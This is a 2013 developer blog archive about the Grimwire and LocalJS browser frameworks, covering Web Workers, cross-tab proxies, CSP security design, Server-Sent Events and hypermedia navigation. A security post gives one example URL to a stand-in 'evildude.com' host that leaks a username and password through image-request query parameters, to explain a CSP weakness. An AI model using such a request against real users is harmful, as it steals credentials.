Wednesday, July 24, 2013

Mysteries...

The cross-tab proxy (a shared worker which transports messages between tabs) has some interesting latency characteristics.

  • Direct request to the cross-tab proxy (httpl://pages.grim): ~2ms
  • Direct request to a local in-page server (httpl://files.grim): ~1ms
  • Direct request to a public server (http://grimwire.com/rel): ~58-60ms
  • Proxy request through the cross-tab proxy to another page, then making a direct request to a public server (http://grimwire.com/rel): ~58-61ms
  • Proxy request through the cross-tab proxy to another page, then to a local in-page server (httpl://files.grim): ~100ms-1000ms
Very strange.
local.web.dispatch({
  method: 'PROXY',
  url: 'httpl://pages.grim/0',
  headers: { 'content-type': 'application/json' },
  body: { method: 'GET', url: 'http://grimwire.com/rel' }}
)
.then(idleForSomeRandomTime) // possible bug?
.then(handleResponse);

Thursday, June 13, 2013

The Multi-tab Security Architecture

So ever since finding out I can make a bridge proxy between tabs using SharedWorkers, I've been trying to figure out what kind of cool stuff I can do with it. My first thought was obvious: over-engineer a complex declarative UI toolkit based on new URI schemes and something called "Compositional Hypermedia Events." It was too much, and I may have pulled a hamstring.

The deal here is, the security model determines everything about Grim. Nothing else matters if it's wrong. The tools we've got are Content Security Policies, Web Worker sandboxes, and now the ability to speak across tabs. The point of the declarative UI thing was to keep javascript out of the document but still make good UIs. It could have worked, I know it!

But I'm going to die one day, so I started looking more at the multi-tab options (which allows document access for apps). So here's the deal with CSP (content security policies):

  • You are mostly controlling what can be embedded in the document. New JS? Images? Iframes? Only from domains X Y & Z, plz.
  • Same with Ajax targets.
  • You can also nuke inlines and eval.

So that's all baller, you might think, I'll just allow images from where-ever (because you gotta have the pics) and then keep the dangerous stuff restricted to my domain. Well, too bad, because a GET request can still leak like a sieve, probably looking like this: GET http://evildude.com/thecatpicyoujusthadtosee.png?user=pfraze&password=banana. You could just allow that, but I'm not sure it's good to hand out that much rope when users don't know what it looks like to hang themselves.

Remember, the security model we've got here is there's one core tab - the Shell - and then there are the other app tabs. You disallow the Ajax in the app tabs, but still let them make requests through the SharedWorker to the Shell. The Shell checks the request against its policies, prompts the user ("Cool if that tab reads your email?") then does the Ajax for the other tab. So this means you can allow at least *some* amount of arbitrary code/content into the app tab, given there's parental guidance, but it's hard to know just how much to allow. Should the tab have no restrictions? If the app is leaky, the user wouldn't know it. It's much better to keep it all funneled through the Shell.

Here's another thing: I really don't want to create a dynamic backend for Grim, but it could help. It would take all of two seconds, and I could probably just use PHP but it would make Grim just a little bit less cool to me, and that's not worth it. I wouldn't be able to host it on GitHub Pages, and there'd be fewer platforms that could run the code with 0 setup. But, if I did, I could load pages with specific CSPs and make choosing the allowed domains a part of the security model. More granularity, more flexibility. So what's the plan?

Well the reason GH Pages is such a cool host is the audibility (and the easy deployment). But it turns out GHP is also awesome for this: it's totally static. Devs hosting assets on it can't introduce server code or access logs. That means you can allow content from *.github.io and not worry about it leaking.



So that's awesome, because it means you can deploy an app for Grimwire by pushing it to a github page. I can piggy-back off of their whole thing. The only thing that would make it better would be access to the backlog of revisions-- but, as @briancarlson pointed out, you can always fork a project and get the revision you need. 

Man, that hot-dog looks good.

Monday, June 3, 2013

Cross-tab Transport Proxies

Last week, I found out about a variation of WebWorker called the SharedWorker. It's supported by Webkit browsers, but not Firefox, which is probably why I never noticed it - MDN doesn't document it, and I generally avoid tech without both moz and chrome.

This one's worth it. One of the crucial issues in Grim/Local is the security of the document. Using CSP, I stop applications from adding their own Javascript to the page. This is good, because then I can manage the document as a shared resource and enforce a zone of trust, but it's also bad, because HTML isn't expressive enough for rich, realtime server-side control. New HTML behaviors (widgets, SSEs, html-deltas) have to be added to get rich UIs, and that's a difficult process.

Shared Workers introduce the possibility of proxies which bridge between pages with different security profiles. Effectively, each page becomes a server to other pages. This means that sensitive applications can live inside of high-security tabs (high-secs) where only trusted JS is allowed, while less trusted applications can run in low-security tabs (low-secs) where they can add document javascript more freely.

The low-sec/high-sec relationship is one we already use with email. When you forget your password, you have a message delivered to the inbox tab, where you then authorize the action in the application tab. Currently, we use email to transport between these different trust zones. With cross-tab proxies, you can use Ajax to reach a high-sec.

Content Security Policies still play a key role. In the low-secs, you don't have XHR, but you can add scripts and styles from an application host. High-secs allow the XHR, but keep the document clean. The sandbox created for low-secs should funnel all of their interactions through other tabs, so that actions are still audited.
 
Grimwire still views document code as an extension to the browser/client, not as an extension to the application. Generally speaking, this is a guideline to make everything reusable and HTML-powered (using things like data-* directives, or, with components, custom elements). Relaxing the control over the document means that you can more freely extend the browser. It takes some of the pressure off the response content-types to represent all rich and realtime behaviors, and lowers the barrier to entry for Grim/Local.

I refactored Local to support SharedWorkers (and improved the web & worker APIs in the process) which puts its development at 0.4.0. I'm going to start on 0.2.0 of Grimwire to support this change to the architecture, and to support permissioning and the WebRTC transport. I'm probably going to ditch the JSON manifests of applications and try to simplify things a bit.

Monday, May 27, 2013

Composition through REST

TL;DR


By restricting application code from the client-side of the Web, REST messaging can become the exclusive driver of application behavior. Generic clients with more fine-grained control of the document can then introduce compositional qualities, improving user control over application behavior.

Compositional Architectures


The basis of composition is a unified interface, and unification is created through constraints. Universal I/O connectors simplify configuration and can result in emergent qualities. The go-to example is Unix's files and streams: components using streams can combine with pipes, resulting in more compact and reusable software.

Plan9 expanded on the Unix premise with a more rigorous unified interface ("everything is a file"), a networked messaging protocol, dynamic file namespace construction through layering, and a self-wiring GUI. It can reconfigure the view of resources -- keyboards, monitors, CPUs, storage, NICs, printers, software -- for each process by layering namespaces. That mechanism is used to enforce permissions, alter software behavior, and bridge machines over the network (without process awareness). By treating every interface as a file, Plan9 is able to apply tools and policies across broad slices of the system, often simplifying its design in the process.

The Web Protocol


REST defines a universal networked namespace of resources, application-driven navigation with hypermedia, and content-type negotiation, with constraints to allow caching, layering, and uncapped client counts (due to statelessness). It's a distributed data-store, but the resources are defined by applications which can apply their own logic (like 9P). The unified interface then makes it possible for clients to be architecturally generic-- but only to a point. Despite the compositional qualities of REST,  Web applications don't let end-users take advantage of them. There is no equivalent to the pipe and stream.

Why is this? My belief is this: browsers don't provide managed cross-application access to the client resources. Instead, rooted in the document-browsing model, they've relied on complete isolation in the GUI environment. This policy forms a tight binding to the host of the application, limiting configurability to the options provided by the application itself. By not continuing to refine the granularity of the client architecture (possibly due in part to failures of features like frames) we've missed opportunities to create more powerful uniform controls in the browser.

In this post, I'm going to argue for altering the role of client-side code. By restricting application logic from the client (zero out of-band knowledge) and using Javascript to extend the browser's behaviors, all application-level interactions are forced into REST messages. This provides the opportunity to introduce compositional tools, possibly mimicking concepts from Unix and Plan9.

Client as Browser, Server as Application


This approach requires the frontend to fully separate from the backend. The document software focuses on response interpretation, management of resources (such as the DOM or localStorage), traffic permissioning, and other system properties. Some of these responsibilities could be implemented without scripts (in the browser itself) but the goal is not to eliminate client Javascript - just to restrict it from application-specific behaviors (which are server-side concerns).

In this model, users choose between pages to get different security profiles, UI capabilities, and software configurations, then load interfaces for applications (defined by servers) into the environment. By sharing behaviors (particularly to do with response-interpretation) different pages can reuse applications. One obvious application for this is responsive design - clients can be selected to fit the medium, and applications can reduce layout concerns.

Content Security Policies can be used to embed untrusted content without sanitization. This makes it possible to implement frame-like behaviors at a finer grain with client code. The strike against CSP has been the issue of delivering richness without javascript. This is also solved by the generic client, which interprets directives from the response (status, headers, content-type behaviors, HTML directives) to safely produce high-level UI behaviors.

(It should be noted that iframes, even with some recent additions, are not suitable containers for untrusted code until they execute in a separate thread.)

Available Tools


The concept of "layering" makes it possible to introduce proxies into interactions with an application. This can be (and often is) used to add or modify behaviors, cache intelligently, anonymize, log, run security policies, and separate UIs from data-services (and layouts from UIs). Giving the client simple controls over this behavior - perhaps using a piping language - should result in more compact and flexible programs.

Hypermedia is another important tool to examine further. With data-uris, links can now designate static resources (a good opportunity for client-supplied data). Increasing the kinds of resources which URIs can target (by adding new schemes) increases the opportunities for unified controls.

The Link header centralizes programmatic access to hypermedia and creates a mechanism for exporting configuration (with HEAD requests). Link attributes - particularly "rel" and "title" - can describe an href with application-level semantics. Custom rel attributes (using URLs) can apply additional requirements on the target resource and its supplied representation, such object schema definitions - important for compatibility negotiation. URI Templates parameterize the links, further reducing out-of-band knowledge and simplifying client design. In combination, these techniques enable programmatic navigation.

Using link attributes to navigate hypermedia allows clients to parameterize views of resources. For instance, consider the following navigations:

HEAD http://myhost.com
  HEAD rel=collection title=users (http://myhost.com/users)
  GET  rel=item       title=bob   (http://myhost.com/users/bob)

As far as the consuming program is concerned, there is some initial URL, the "collection:users" navigation, then the "item:pfraze" navigation. Thus, it's view of the process is:

HEAD (x)
  HEAD rel=collection title=users (y)
  GET  rel=item       title=bob   (z)

By expecting host URLs in the "x" parameter, programs can be configured to consume different services by handing them a "dot com," a familiar and simple tool for users.

A notable recent addition to HTML5 is Server-Sent Events, which allows realtime server-to-client updates which work across the network (though at some cost of scale, as each event-stream requires a persistent connection). This is a useful mechanism for syncing the client with the application without requiring an initiating user-action.

Generic Client Designs


The available tools can be exploited in a variety of ways, each with their own effects. The client I'm developing (Grimwire) has been through a number of iterations.

The first iteration was command-line based, included "fat" pipes (response->request pipes that defined the content type), and assigned names to individual "frames" on the page which could be used as aliases to the host that delivered the response. The CLI looked like this:

users> get http://myapp.com/users [json]
friends> get users/pfraze/friends [json]
get users/jdoe [json] post friends
delete friends/harry

This original "fat" pipe technique (defined above by the brackets, eg "[json]") did not leverage proxies. Instead, it issued each request in the pipeline as individual requests from the client, using the body of the previous response as the body of the subsequent request.

The "frame" which issued the request would receive the final response in a "response" DOM event. At that time, I allowed application client code (as widgets) to handle the response and alter the DOM directly. I also had the widgets themselves export Web APIs (as servers) which made it possible to do things like checking a box in a table with ck mail/5. You can find a demo video here.

(In-document servers, I should note, are added through an Ajax library which examines the protocol and routes "httpl://" requests to javascript functions. As mentioned above, this increases the usability of URIs, allowing them to target client resources - like the DOM - and applications which live in Web Workers - described below.)

I dropped the first iteration's approach for a couple reasons. The first is that I think the CLI can be dropped in favor of something simpler and GUI-driven without losing the precision. My feeling is that the CLI, if needed, should be an application, not a client feature.

The other issue was whether it's right to export a server-interface for the DOM. Doing so is in line with Plan9's approach to the GUI (where windowing and rendering is controlled, of course, by files) and matches the intent of a universal interface, but it seems to break the mental model of the browser without gaining much value. It confuses the server/client relationship a bit to handle requests by issuing subsequent requests on the DOM (what does the response do?) and remote servers would be unable to access the same tools. The async nature of requests also made them somewhat less convenient to use for DOM manipulation.

In lieu of the widget-servers, I started using Web Workers to host "local" servers under the "httpl://" namespace. This forms an on-demand collection of apps within the session which can give strong guarantees of privacy without requiring private webhosts. Shared Workers, once they have better support, will also be available to bridge between browser tabs. Ideally, Workers could be used to sandbox untrusted code, which would then be used with the same privacy guarantees-- but the security of that approach isn't proven yet.

Servers in the local namespace are considered elevated regarding Hypermedia discovery - it's assumed that any links they export should be consumed. For instance, the search program looks through all local servers for a rel="http://grimwire.com/rel/index" link, then automatically GETs and indexes that content. The registry of auto-discovered workers could also include links to remote hosts set by the user. This should provide high-level control over software composition with a fairly simple configuration-step (choosing active programs).

Rather than have DOM regions export interfaces, I'm testing embedded information which can flow through operations. You can find older demo videos of this here and here. In the current build, dropping the "Email" operation onto embedded data results in a GET request to the mail application for an interface to insert. The "Email" operation is itself just an exported link with the "http://grimwire.com/rel/transform" rel attribute. The generated request includes serialized data about the drop target, allowing the application to seamlessly populate itself.

In the future, I want to experiment with more layering (proxy-based) tools, and take stronger advantage of Hypermedia discovery rather than configuration. Currently, I use JSONs to define application packages; I think they could be factored out. Additionally, I need to start forming an approach to security and permissioning. Doing so would enable untrusted applications to enter the user's environment, and could expand the possibilities for multi-user environments.

Final Words


Adding a new constraint to the Web is not easy, particularly when it takes away Document API access from the application developers. Some modern projects, such as Meteor, actually look for more application code in the frontend, not less. However, bucking this trend for a little added pain could result in significant payoffs.

The quality of the system is largely dependent on the capabilities of the client, but the fundamental concepts (server-side applications, common response interpretation behaviors) are homogeneous enough to translate between many different clients. By using pages as extensions to the browser, users can customize the client on-demand and choose the environment that suits their needs.

As we move into new computing interfaces (VR/AR, motion tracking, voice-recognition) client-side versatility will become increasingly important. Moreover, effective application of these techniques could account for holes in the architecture of the Web (privacy, user-extensibility). Improved granularity could result in more compact and reusable applications, and create opportunities for effective compositional techniques on the Web.

If you'd like to know more about Grimwire, visit the documentation in the nightly build, the Gougle Group, or the repository, or follow me on twitter.

Saturday, May 25, 2013

Microdata: An Open Standard vs Efficiency

This isn't a major issue. I just thought I'd write about a question I'm working on.

Grimwire dev branch currently uses the Microdata standard to embed data into the interface. Because the items API is not implemented in enough browsers (chrome) Grimwire has to do attribute-based selector queries (which are slow) to manually form the item. This gets worse when dealing with embedded objects. It's not a huge problem, but it's not good. Chrome will probably (?) implement it later.

That said, Grimwire also uses data-uris to allow hrefs to indicate chunks of data. Calling local.http.dispatch({ url: 'data:text/plain,foobar' }); gets you back a status=200, Content-Type=text/plain, body="foobar" response. Embedding JSON as a data-uri would be more efficient than Microdata, and would allow httpl (the namespace targeting web workers) and http addresses to be used (realtime freshness).

Choosing between the open standard and something more specific is a hard choice. I try to only do the latter when I think I can make a case for other people to adopt the same standard. I wouldn't buck tradition unless I thought I could defensibly improve it.

Microdata is nice. It pushes toward the interleaving of representation for machines and for humans, which I like, but... it's a hassle. When I'm writing HTML, I want to specify as few attributes and elements as possible. If I could condense it into one element which takes a JSON data-uri, I'd be happier.

Not only is an embedded JSON data-uri faster to code, it requires less markup data and less DOM traversal. Representational State Transfer is all about the content-types, and HTML is all about the embedding. It even has an element for it: <object>. That seems like a better direction.

The final argument I can entertain for Microdata is that it does bind the machine-readable data to visual elements. I'm unsure that Grimwire can take advantage of compositional tools so fine-grained that individual DOM elements need semantic binding-- but this could change if the binding is used to do realtime content updates, or if VRUIs can make use of the granularity in some way not currently possible (semantic visual structures, for example).

And here's another point -- Microdata includes the itemtype attribute, which I think is important for discovery/routing. If I go with <object>, I'll likely have to use a non-standard attribute like itemtype, which I prefer not to do.

Two good answers. I hate that.


Friday, May 24, 2013

LocalJS & Grimwire: A program architecture for Web Workers

Recently, I tagged 0.1.0 of Grimwire, and 0.3.0 of LocalJS. After 14+ months of development, the software is stable enough - still experimental, but stable enough - to use.


TL;DR


Grimwire is a frontend Javascript environment that gives user control over loaded scripts using a program architecture built on Web Workers and RESTful messaging. It's multi-threaded and provides tools for composing user interfaces.


A User-Extensible GUI Environment


This project was started to improve the flexibility of Web software and make it convenient for users to inject their own programs into the page. It's meant to do this while maintaining the convenience of on-demand software (that is, loaded in-browser). The end goal is to create a GUI environment that's easy and safe to extend with applications, thereby decoupling frontend software from backend services.

It attacks this goal in two ways: first, by creating a client-side toolset which gives Web services control of the document without delivering custom client-side code; second, by applying a RESTful messaging protocol over the Web Workers postMessage() API, enabling Javascript servers to be downloaded and executed in isolated threads. The net effect is a program architecture which the document software manages.

Restricting client-side code from the servers is an atypical constraint. Doing so, however, enables finer-grained security and composition:

  • Security. The client-side namespace only loads trusted software from the host. Web Workers, then, contain userland applications which must pass their messages through the document for auditing and delivery. This, combined with Content Security Policies, should make fine-grained security & permissions policies possible. (Iframes may also play a role, but their lack of thread isolation makes them bad candidates for user software.)
  • Composition. With Web Workers receiving Ajax calls under the "httpl://" interface (LocalJS), a general-purpose client can intercept request-forming events (link clicks and form submits) and route them to the Workers. That client program (Grimwire) then manages the document's resources (sessionStorage, security credentials, the DOM) under the user's direction. Using Hypermedia tools, software can discover resources in the environment, providing auto-configuration and composition between unfamiliar programs.

LocalJS - the core framework


LocalJS is a program architecture for frontend software. It can be used in any web app (games, applications, web desktops) to host third-party software. Because the programs are hosted in Web Workers, all user code is isolated in separate threads, and all interactions occur through messaging. Local applies REST over the Workers' messaging to allow them to behave as Web servers.

// load a local web server into a worker
local.env.addServer('helloworld.usr', new local.env.WorkerServer({
  src: 'data:application/javascript,'+
  'function main(request, response) {'+
    'response.writeHead(200, "ok", {"content-type":"text/html"});'+
    'response.end("<h1>Hello, World!</h1>");'+
  '}'
}));

// load the HTML from the worker server into #content
var region = local.env.addClientRegion('content');
region.dispatchRequest('httpl://helloworld.usr');

Some APIs in the Worker (such as XMLHttpRequest) are nullified so that all traffic must be routed through the document to be examined. For applications using HTML, Local isolates browsing regions on divs - iframes without the sandboxing. To keep the document trusted, services can use Content Security Policies to restrict client-side code and styles.

Note: Though LocalJS is being built for secure computing, the security features aren't complete yet, and many browsers have half-baked CSP support. Don't run untrusted code yet!

The libraries use promises for all async and take some cues from NodeJS, including require() & module.exports (for the Workers). You can find more information at http://grimwire.com/local/index.html.


Grimwire - a Web OS built for composable social computing


Grimwire is a deployment of LocalJS which behaves as a generic program execution environment. It defines applications using JSON configurations and includes tools to modify the software within the browser session. Future releases will include permissioning (so that users can share programs) and WebRTC as an Ajax transport (so users can serve applications directly to peers).

Since applications can't touch the document directly, they rely on HTML directives, response status codes, and special content-types to create rich & realtime UIs. There's a pretty wide set of use-cases already covered, but some needs are not yet covered. Getting this toolset right is the main objective of the 0.1.x release schedule. Afterwards, 0.2.x will focus on the security and multi-user features.

REST Architecture


Grimwire/LocalJS first started as an attempt to implement Plan9's universal files interface in the Web. It eventually dropped files in favor of REST, and now focuses heavily on Hypermedia discovery. In Grimwire, a link or form can refer to either: a chunk of data (data-uris), a local script, or a remote service. This initial abstraction simplifies the task of injecting new code into the environment - rather than event-binding, programs describe interactions in HTML and HRefs. The Link header, combined with URI templates, enables programmatic discovery of services and resources. Additionally, Server-Sent Events allow programs to sycronise by subscribing to event-streams (local or remote). These tools make it relatively painless to get unfamiliar programs talking to each other.

// programmatic hypermedia discovery with the navigator
local.http.navigator('http://myhost.com')
  .collection('users')
  .item('pfraze')
  .getJson();

// event subscription
var stream = local.http.subscribe('httpl://myhost.com/news');
stream.on('update', function(e) { console.log(e); });

There's more to find in the documentation, as well as some new tools at work in the dev branch.

How to Get Involved


Grimwire is meant to be used as a frontend framework for services. The host can add CSS to skin the environment, and also add client-side code if needed. There are no backend dependencies, so you can deploy statically or from a custom server.

Eventually, Grim should be an easy-to-use platform with a strong selection of apps, reducing the time to develop and deploy Web software. Right now, it's just a decent set of tools with a few holes to fill. If you want to get involved, there's a lot of opportunity to help make core decisions and core apps. Get in touch at pfrazee@gmail.com, @pfrazee, or any of the project's boards.

You can find the documentation in the nightly build. Questions and comments should be posted to the Grimwire Google Group. The repository can be found at github.com/grimwire/grimwire, MIT license.




Very special thanks to Goodybag for supporting Grimwire's development and actively investing in FOSS. It's because of progressive businesses like them that the Web can change for the better. If you're in Austin, keep an eye out for their tablets at restaurants, and bug the shops that don't have one yet!




Tuesday, May 7, 2013

How the Grimwire Search Program Discovers New Applications and Indexes their Content

The Search application on Grimwire recognizes when new applications enter the environment and fetches data from them to populate its index. When applications are closed, their data is automatically depopulated. This post will explain how this works, both so that you can take advantage of the Search app, and so that you can use similar techniques in your own applications.

The Config Server

All of the environment's active configuration is hosted at httpl://config.env. It hosts the /apps collection, which provides the "Applications" interface and their JSON configs.
The only other environment server at this time is httpl://storage.env, a sessionStorage wrapper.
The /apps collection also hosts an event-stream which emits an "update" event when applications are added, removed, or reloaded (which happens on every config change).

// listen for new applications
local.http.subscribe('httpl://config.env/apps')
    .on('update', updateSources);
updateSources();

This is how the Search application becomes aware of new apps in the environment. If you're not familiar with Server-Sent Events, this post gives a brief introduction.

Finding the Data to Index

Every application defines a "startpage," which is the primary entry-point for its APIs. The Search application uses that URL to identify each source.

function updateSources() {
    local.http.dispatch({
        url:'httpl://config.env/apps',
        headers:{ accept:'application/json' }
    }).then(
        function(res) {
            var cfgs = res.body;
            for (var appId in cfgs)
                addSource(cfgs[appId].startpage); // <-- here
        },
        function(res) {
            console.log('Failed to fetch active applications');
        }
    );
}

Grimwire defines a custom rel-type for exported searchable data: http://grimwire.com/rel/index. The Search app checks each application startpage for a link to that relation.

function resolveSourceIndex(startPage) {
    return local.http.navigator(startPage)
        .relation('http://grimwire.com/rel/index')
        .resolve(); // just give me the URL
}

If you're not familiar with the navigator, there's a small introduction here. This function will generate one HEAD request to the startpage URL, then check the returned links for a rel="http://grimwire.com/rel/index".

Getting the Data

The next step is to get the docs and to watch them for updates in the future.

function addSource(sourceUrl) {
    resolveSourceIndex(sourceUrl).succeed(function(indexUrl) {
        getSourceDocuments(sourceUrl, indexUrl);
        local.http.subscribe(indexUrl).on('update', function() {
            getSourceDocuments(sourceUrl, indexUrl);
        });
    });
}

This allows applications to trigger re-indexing so they can maintain freshness.

getSourceDocuments() issues a GET request for json. It expects an object to be returned with the items attribute populated with an array of objects, according to this schema:

{
    items: required array of {
        href: required url (primary key),
        title: required string,
        desc: optional string,
        category: optional string
    }
 }

This data will be used to populate the search dataset and to render results. The use of this schema is implied by the "http://grimwire.com/rel/index" relation, which is why the custom relation is used instead of the standard "index" relation.

Wrapping Up

The two tools in use here are Server-Sent Events for syncing and the navigator for discovery. By listening to the event-stream of the config server's applications, the Search app can react to new programs. Likewise, by listening to the indexes of the apps, Search can keep its data-set fresh. Meanwhile, by looking for the "http://grimwire.com/rel/index" relation in Link headers, Search can discover what data to index and expect a specific schema.

These techniques can be used in your applications, and are not restricted to Worker servers. Server-Sent Events and the Link response header are HTML5 standards, so any remote host can leverage the same tools.

Read more at github.com/grimwire/grimwire.

Syncing with Server-Sent Events

Server-Sent Events are a recent HTML5 addition which allows web apps to open and listen to event-streams from remote servers. Grimwire uses SSEs as a tool to keep programs and interfaces in sync. This post will give a quick overview of the APIs and how they can be used.

local.http.subscribe()

This function takes a url and issues a GET request for the "text/event-stream" type. If targeting a remote server, it will leverage BrowserRemoteEventStream. Otherwise, it issues an HTTPL request and manually watches for updates on the stream. From your perspective, it all looks like this:

var stream = local.http.subscribe('httpl://foo.usr/some/resource');
stream.on('update', function(e) {
    console.log(e.data);
});
stream.on(['foo','bar'], function(e) {
    console.log(e.event); // 'foo' or 'bar'
});
// ...
stream.close(); // client-side disconnect

In keeping with browser implementations, closing the event stream (from the server or the client) will emit an 'error' event with an undefined e.data.

navigator.subscribe()

If you find yourself needing to navigate to the event-stream, you can use navigator.subscribe(), which promises the EventStream interface:

local.http.navigator('httpl://foo.usr')
    .collection('some')
    .item('resource')
    .subscribe()
    .then(function(stream) {
        stream.on('foo', onFoo);
    });

data-subscribe

Grimwire doesn't allow any javascript to enter the document, meaning there's no client-side code. To create rich realtime UIs, servers use some added response directives, content-types, and HTML behaviors. One of the most common of these is the "data-subscribe" attribute.

<div data-subscribe="httpl://someserver.usr/some/resource">
    <p>This was last updated at 10:27:54</p>
</div>
<p>This will not be updated.</p>

Any element with this attribute will open an event-stream to the target and listen for the "update" event. Every time this occurs, the client region will issue a GET request to the same resource, then replace its innerHTML with the response. You can think of this as triggering targeted page-refreshes.

If the content of the refresh is at a different location than the event-stream, you can specify that URL afterward.

<div data-subscribe="httpl://foo.usr/bar httpl://foo.usr/buz">

Lastly, if the "data-subscribe" attribute is set on a form element, the form's "accept" attribute will be used, and its inputs will be enumerated in the query parameters of the request. This can be used to push up information about the client state.

local.http.broadcaster()

On the server end of things, you'll need to track any event-stream responses you have open so that you can write events to it. Grimwire gives you local.http.broadcaster() to help with this.

// This server is an open event relay
// - it rebroadcasts any data POSTed to it
var mybroadcast = local.http.broadcaster();
function main(request, response) {
    if (/event-stream/.test(request.headers.accept)) {
        response.writeHead(200, 'ok', {
            'content-type':'text/event-stream'
        });
        mybroadcast.addStream(response);
        // NOTE: don't call end() on the response!
    }
    else if (request.method == 'POST') {
        response.writeHead(204, 'no content').end();
        mybroadcast.emit('post', request.body);
        // ^ will broadcast to all open streams
    } else
        response.writeHead(400, 'bad request').end();
}

You can read more about its api in the Local documentation.

Wrapping up

Server-Sent Events are a very useful tool for synchronizing programs with other programs and with their interfaces. Consumers can access them using the subscriber APIs, and servers can broadcast them from any URL. Combining their "push" architecture with REST's "pull" requests makes it possible to build tightly-synced applications without tight coupling.

Read more at github.com/grimwire/grimwire.

Sunday, May 5, 2013

Programmatic Web-browsing with http.Navigator

Did you know there's an HTTP response header called "Link"?

> HEAD / HTTP/1.1
> Host: http://pfraze.blogspot.com

< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013>; rel="collection"; title="2013"

It describes resources which have some relationship to the current one, primarily through the "href" (the URL), the "rel" tag (a keyword describing the relationship), and the "title" tag. Grimwire's local.http.Navigator object makes use of it by searching the rel tags and titles:

local.http.navigator('http://pfraze.blogspot.com')
    .collection('2013') // find a {rel=collection, title=2013} link
    .collection('05') // find a {rel=collection, title=05} link
    .item('programmatic-web-browsing-with-http-navigator')
    // ^ find a {rel=item, title=programmatic...} link
    .getJson();

Each navigation is lazy, choosing only to resolve with a HEAD request when the program asks the navigator to make a request. In the example above, "getJson()" would have triggered this traffic:

> HEAD / HTTP/1.1
< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013>; rel="collection"; title="2013"

> HEAD /2013 HTTP/1.1
< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013/05>; rel="collection"; title="05"

> HEAD /2013/05 HTTP/1.1
< HTTP/1.1 200 OK
< Link: <http://pfraze.blogspot.com/2013/05/programmatic-web-browsing-with-http-navigator>; rel="item"; title="programmatic-web-browsing-with-http-navigator"

> GET /2013/05/programmatic-web-browsing-with-http-navigator HTTP/1.1
...

There's one round-trip per navigation, but, since Grimwire runs Web servers within the browser, a lot of that traffic will be at a negligible latency.

To avoid enumerating every possible link, the navigator also uses URI Templates:

Link: <http://pfraze.blogspot.com/{title}>; rel="collection"

This would result in the exact same behavior as above. Grimwire first tries to find a link that matches both rel and title. If it doesn't find that, but does find a link with a matching rel-type and no title attribute, it'll use that. This allows you to spec out your URI scheme generally, rather than enumerating every reachable URI.

More extensive templates, with more variables, can also be used:

local.http.navigator('http://pfraze.blogspot.com')
    .collection('posts', { tags:'grimwire' })
    .getJson()
// > HEAD http://pfraze.blogspot.com
// < Link: http://pfraze.blogspot.com/{title}{?tags}
// > GET http://pfraze.blogspot.com/posts?tags=grimwire

If any of the navigations don't find a matching link, it rejects the response promise with a 404.

Advantages:
  • No manual URI construction.
  • Less out-of-band client knowledge - with the links, the server can change URIs at any time, possibly routing to other hosts or new URI schemes.
  • By default, a 404 will not be retried, reducing traffic in a failure condition.

Tips:
  • Generally, only link to items which are "adjacent" in the resource hierarchy. (/a should link to / and /a/b, but not /a/b/c). This is because a subsequent navigation can accomplish the same thing, and it's easier to describe links that are 1 hop away in relevance.
  • A Grimwire Worker server can describe the Link header as an array of objects. The attributes map directly to the standard Link definition, but also include the "href" key, which specifies the URL. For instance, [{href:"http://pfraze.blogspot.com/{title}", rel:"collection"}]
  • More documentation can be found at grimwire.com.

Maintain error output in Promises/A+

The Promises/A+ spec requires that you catch exceptions in a callback and use that signal to reject the enclosing promise. Unfortunately, Javascript exceptions catch semantic mistakes (typos) along with application-level faults.

promise(someAsync()).then(function(result) {
    return resul.doSomething(); // typo, never gets logged
}).then(function(result2) {
    // never gets called!
});

How do you catch programming errors when using promises? If you're in Chrome, you can set the debugger to stop on all exceptions, but that's not ideal. If you maintain the promise lib, try this:

var newValue;
try { newValue = fn(parentPromise.value); }
catch (e) {
    if (e instanceOf Error) {
        if (console.error)
            console.error(e, e.stack);
        else console.log("Promise exception thrown", e, e.stack);
    }
    targetPromise.reject(e);
}

And tada, you now have a stack dump logged with your errors. Most application-level rejections are not Error types (eg throw "not found") so the noise stays pretty near to expectations.